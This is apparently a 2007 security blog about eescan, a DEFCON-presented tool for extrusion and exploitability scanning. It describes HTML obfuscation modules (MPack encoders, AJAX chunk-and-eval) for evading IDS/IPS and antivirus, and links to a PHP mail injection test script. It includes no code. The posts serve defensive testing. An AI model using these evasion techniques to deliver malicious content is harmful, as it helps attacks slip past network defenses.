Thursday, July 26, 2007

New Twists for HTML Obfuscation in EEscan

Update 8/7/2007 - Please see www.eescan.net for additional details.

I've just finished coding up some new HTML obfuscation modules for eescan. The exploitability tests in eescan will use these obfuscators to probe for

Here are some of the obfuscators that work right now:
  • gzip
  • deflate
  • chunked
  • MPack XOR javascript encoder
  • MPack cryptor 4-pass javascript encoder
  • AJAX
  • SSL
  • HTTP over port 443
  • SSL over port 80
  • arbitrary combinations like AJAX->Mpack->gzip->chunked->SSL->port 80
My favorite so far is AJAX which breaks up the target html into a random number of arbitrary chunks, downloads each using a synchronous request, reassembles them and then eval()'s the code.

Initial testing of the Ajax modules is yielding great results against network based IDS/IPS, so-so results against proxies and good results against desktop AV/IPS suites.

Labels:

posted by Matt Richard @ 11:36 AM   1 Comments

Wednesday, July 11, 2007

Almost ready for eescan

Update - For more information see http://www.eescan.net

All of the upgrades went smoothly and now I've got the colo ready for some eescan action. I was able to add some dedicated IP addresses to my machine and some precious disk space.

You might be asking what this whole eescan thing is all about. Well I guess you'll just have to come to the talk at DEFCON to find out. Here's the abstract:

With this presentation we will demonstrate a new tool called eescan that automates extrusion and exploitability scanning using a client/server approach. Eescan will be released under the GPL and utilizes python to create an extensible framework for testing extrusion and exploit defenses.

All network security systems have gaps. Layered security tries to cover the gaps with overlapping protections like firewalls, intrusion prevention, proxies and other mechanisms. How do you really know where the gaps are before the weeds grow through? Vulnerability assessment tools scan for vulnerable systems from an attackers perspective. This technique has value but fails to represent the risk posed by client application usage and attacks. They also fail to assess extrusions - the traffic content allowed to leave a network.

Extrusion and exploitability scanning attempts to find these gaps using an automated scanning framework. The scanning techniques simulate user and attacker behavior from the client perspective to holistically measure the amount of risk in a given security system.

posted by Matt Richard @ 9:11 AM   0 Comments

Tuesday, July 10, 2007

Downtime for eescan on 7/10/07

During the day today I'll be taking down mullingsecurity.com and for some upgrades to prepare for eescan. The upgrade will consist of an upgrade of the OS, bigger disk and some additional IP addresses.

The extra IP addresses are needed so that I have clean IP's available for eescan to use for egress and extrusion scanning. The extra disk space won't hurt either.

posted by Matt Richard @ 9:33 AM   0 Comments

Monday, July 09, 2007

Did Google send you?

I find it fascinating how people arrive at a lowly blog with very little traffic. The short answer is that most visitors arrive via search terms.

Some of the search terms are predictable based on past blog entries. By far the most popular search engine queries leading to www.mullingsecurity.com are variations of the following:
  • q=ddabx.dll (interesting since the malware is 2+ years old)
  • q=php+mail+injection (a classic still in use by spammers and yes they come here for tips)
  • q=omfg.class (a really old java exploit)
And then there are the really interesting queries that lead here.!
  • http://search.live.com/result.aspx?q=adult
  • http://search.live.com/result.aspx?q=mercedes
  • http://search.live.com/results.aspx?q=DOOR+BADGE+SECURITY
  • http://search.msn.com/results.aspx?q=door+security+posts
  • http://www.google.com.au/search?q=what+ports+do+i+need+to+open+on+firewall+for+stunnel
  • http://www.google.com/search?q=+Matt+Richard+security
  • http://www.google.com/search?q=gmail+body+location+bar
  • http://www.google.com/search?q=%2B%22card+cvv2%22+%2Bphishing
  • http://www.google.com/search?q=howto+remote+exploit+127.0.0.1
  • http://www.google.com/search?q=squid+botnet+domain
I conclude the following:
  1. MSN Live search really sucks.
  2. There are people exploiting localhost remotely.
  3. Having random security words on the same page gets you hits from Google.

posted by Matt Richard @ 11:01 AM   1 Comments

PHP Mail Injection Testing Script

Here is a sample Perl script to test for PHP mail injection. The code has some documentation and might be usable if you already know how to hack foreign perl scripts. :)

Most people try to test using GET requests which will fail every time since the browser and web server don't like processing the needed cr and lf's correctly. The script makes a post request to the server using 3 command line arguments. It won't work as is since you will need to modify for the target scripts form parameters.

I think I wrote this in February 2006 while helping a friend secure his contact form against php mail injection bugs.

Enjoy! http://www.opensecnet.com/php_inject_sample.pl.txt

posted by Matt Richard @ 10:52 AM   0 Comments

Extrusion and Exploitability Scanning accepted for DEFCON 15

I'll be presenting my latest research on extrusion and exploitability scanning at DEFCON 15 this year. You can find presentation info and bio at http://www.defcon.org/html/defcon-15/dc-15-speakers.html#Richard.

The presentation is at 12:00pm on Sunday - check the DEFCON official site for more info.

posted by Matt Richard @ 10:11 AM   0 Comments